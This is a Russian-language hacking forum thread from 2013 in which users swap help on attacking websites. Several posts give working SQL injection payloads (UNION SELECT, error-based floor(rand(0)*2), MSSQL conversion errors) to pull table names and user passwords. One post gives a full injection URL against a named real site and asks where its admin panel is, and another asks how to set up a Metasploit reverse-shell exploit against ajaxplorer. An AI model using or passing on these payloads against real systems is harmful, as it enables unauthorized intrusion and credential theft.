Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    запрос выбирает таблицы из текущей базы
     
  2. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    Все верно, тебе просто по ошибке написали для phpbb2
    Для phpbb3 все проще
    https://rdot.org/forum/showpost.php?p=1143&postcount=2
     
  3. kilo_star

    kilo_star New Member

    Joined:
    21 Apr 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    непонятна конкретно эта часть:

    0x3a,floor(rand(0)*2))
     
  4. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    floor(rand(0)*2) - выражение, которое приводит к ошибке в базе данных, вследствии чего происходит вывод данных.
     
  5. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    0x3a - двоеточие. Следующая запись нужна для того, чтобы повторить значение, что вызывает ошибку группировки (повтор записи). функция rand() генерирует кажыдй раз новое значение, которое не совпадает с предыдущим, чтобы значения были предсказуемы (т.е после первого rand идёт 1.241763483026776 и так всегда) ему кидается аргумент, наиболее подходящий для floor. floor берет из полученного значения только его целое, т.е только то, что идет перед . и каждый 2 раз (в случаи с rand(0)) получается одно и то-же значение.Кстати, вместо этой конструкции можно написать rand(rand(0)), что каждый раз будет возвращать одно и то-же , только к выводу уже прибавится полученное значение значение.
     
    3 people like this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    не проще, я же писал

     
  7. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    Я не видел, что ты писал.
    Есть еще один способ.
    https://rdot.org/forum/showpost.php?p=25479&postcount=7
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такая проблемка

    есть запрос

    +union+select+1,user_password,3,4,5.6,7.8,9,10,11+from+users+limit+0,1--+

    в ответе

    Table 'med.users' doesn't existTable 'med.users' doesn't exist

    при попытке вывести названия баз ничего не выводит, можно былобы решить проблему взявши вывод в substring но присудствует фильтрация на скобки, что посоветуете?
     
  9. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    Переводя с англ. таблица users не существует)
    Судя по user_password ты ковыряешь phpbb, возможно у таблицы есть префикс, узнай сначало его, если есть information_schema.
     
    #22569 Ravenous, 6 Oct 2013
    Last edited: 6 Oct 2013
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    вам не кажется что вам еще рановато давать советы в подобных темах?

    я английский и без вас знаю, а то что в ответе указывается имя БД то тут и дураку станет понятно что она не одна, и поэтому выборку нужно сделать из тругой, а проблема состояла в том что не выходит выбрать имена БД из табле схема, о чём написано в предыдущем моём посте
     
  11. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Не могу разобраться , что куда вставлять. =)
    [​IMG]

    exploit
    1. RHOST ( вставляем ИП сайта)
    2. RPORT ( стандартный идет 80 )
    3. TARGETURL ( вставляем директорию , где ajaxplorer )
    4. VHOST ( Опять вставлять ИП сайта ?)

    payload( он выбрал автоматически ) это cmd/unix/reverse
    5. LHOST ( что поставить? ) (Я ставил ип машины своей)
    6. LPORT ( Какой порт поставить ? стандартный тоже 80 или 8080 ? )

    target здесь один "0"

    Пишу exploit , вот что выдает
    Code:
    [*] Started reverse double handler
    
    [*] Exploit completed, but no session was created.
    Вот , что пишет и все. Больше ничего не происходит , где я сделал ошибку ?
     
  12. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://0per.wordpress.com/tag/sql-injection/
     
  13. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    100
    Likes Received:
    31
    Reputations:
    27
    Привет. Есть скуля в пост запросе, отправляю через тампер дата. Не могу подобрать число столбов:
    1'+order+by+100+--+ Unknown column '100' in 'order clause'
    1'+order+by+1+--+ Unknown column '1' in 'order clause'
     
  14. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Что делать если MySQL v4.1.21 ??
    Тупо перебор колонок непохек, надо чтото поинтереснее.
     
    #22574 psihoz26, 7 Oct 2013
    Last edited: 7 Oct 2013
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    https://forum.antichat.ru/thread43966.html
    пункт 2.1.4 и, соответственно,подпункты.
     
  16. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0

    id=15&type='+convert(int,@@version)+'

    выводит:
    [Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

    Кто сможет объяснить, как вывести имя таблиц и колонок?
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    В ответе должен получить что-то типа:

    UPD

    Читайте https://rdot.org/forum/showthread.php?t=826, там все расписано.
     
    #22577 YaBtr, 7 Oct 2013
    Last edited: 7 Oct 2013
  18. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    на запрос id=15&type='+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--
    получаю

    [Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'or'.
     
  19. SeveName

    SeveName New Member

    Joined:
    3 Oct 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    скулю раскрутил, только вот админку не могу найти( мож кто знает где она?
    ArxSS и всякие онлайн сканеры не помогают

    HTML:
    http://www.scrutineer.ru/results.php?id=0+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+17,1+--+
     
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Что значит не предел???наверно тут один и тот же параметр попадает сразу в несколько запросов
     
Thread Status:
Not open for further replies.